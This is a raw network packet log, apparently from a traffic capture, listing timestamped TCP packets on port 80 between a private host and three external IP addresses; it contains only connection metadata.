Sep 21, 2024 14:48:10.478550911 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478550911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478564024 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478564978 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478579044 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478590965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478594065 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478601933 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478611946 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478616953 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478627920 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478634119 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478638887 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478650093 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478660107 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478663921 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478677034 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478678942 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478688002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.478697062 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478719950 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.478745937 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479079962 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479090929 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479100943 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479121923 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479123116 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479134083 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479139090 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479146004 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479157925 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479166031 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479170084 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479182005 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479193926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479195118 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479218006 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479238987 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479273081 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479285002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479296923 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479312897 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479372978 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479418039 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479429960 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479440928 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479451895 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479454041 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479461908 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479474068 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479480028 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479485035 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479496002 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479506969 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479515076 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479517937 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479528904 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479537964 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479541063 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479548931 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479552031 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479568005 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479574919 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479581118 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479585886 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479590893 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479595900 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479608059 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479614019 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479625940 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479636908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479640007 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.479650021 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479660988 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479665995 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.479674101 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479686022 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479687929 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.479697943 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479701996 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.479728937 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479731083 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.479743004 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.479753971 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479753971 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.479765892 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479775906 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479784966 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.479787111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479799032 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479810953 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479818106 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479824066 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479834080 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479839087 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479847908 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479851007 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479866028 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479876041 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479880095 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479893923 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.479908943 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479928017 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.479950905 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480268955 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480288029 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480299950 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480309963 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480313063 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480320930 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480325937 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480339050 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480344057 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480350018 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480355978 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480364084 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480376959 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480382919 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480396986 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480427027 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480437994 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480451107 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480459929 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480473042 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480482101 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480483055 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480498075 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480509043 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480515957 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480523109 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480526924 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480545998 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480576038 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480583906 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480595112 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480604887 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480616093 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480627060 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480628967 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480638981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480650902 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480659008 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480662107 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480671883 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480674982 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480685949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480691910 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480700016 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480711937 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480720043 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480730057 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480743885 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480746984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480756998 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480761051 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480770111 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480779886 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480787039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480792999 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480804920 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480815887 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480828047 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480829000 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480839014 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480846882 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480849981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480863094 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480871916 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480878115 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480890036 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480895042 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480901003 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480912924 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480921984 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480926991 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480938911 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480947971 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480951071 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480962038 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480973005 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480973959 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480987072 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.480988026 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.480998993 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481007099 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481013060 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481024981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481035948 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481039047 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481046915 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481059074 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481067896 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481071949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481084108 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481090069 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481095076 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481112957 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481148005 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481421947 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481435061 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481446981 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481457949 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481467962 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481481075 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481479883 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481489897 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481522083 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481560946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481573105 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481584072 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481595039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481595993 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481609106 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481621027 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481627941 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481632948 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481646061 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481652021 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481658936 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481679916 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481698036 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481713057 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481724977 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481736898 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481749058 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481750965 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481760979 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481771946 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481779099 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481786013 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481797934 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481806993 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481806993 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481820107 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481829882 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481836081 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481846094 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481853962 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481868029 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481873035 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481879950 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481890917 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481899023 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481903076 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481914997 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481919050 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481928110 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481939077 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481950998 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481952906 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481962919 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481976032 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481981039 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.481987953 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.481993914 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.482002020 CEST	80	49709	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.482012033 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.482014894 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482028961 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482039928 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482043982 CEST	49709	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.482052088 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482063055 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482068062 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482074022 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482079029 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482084990 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482090950 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482095957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482096910 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482146978 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482496977 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482510090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482522011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482532978 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482544899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482554913 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482557058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482568026 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482589006 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482616901 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482659101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482671022 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482681036 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482692957 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482697010 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482712984 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482722998 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482724905 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482737064 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482749939 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482752085 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482762098 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482770920 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482774973 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482785940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482789993 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482799053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482810020 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482817888 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482821941 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482834101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482842922 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482856035 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482858896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482868910 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482881069 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482889891 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482892990 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482903004 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482907057 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482918024 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482923985 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482932091 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482943058 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482954025 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482954025 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482965946 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482973099 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.482980013 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.482986927 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483002901 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483014107 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483015060 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483028889 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483040094 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483047009 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483057976 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483069897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483076096 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483083010 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483089924 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483094931 CEST	80	49712	103.130.147.211	192.168.2.9
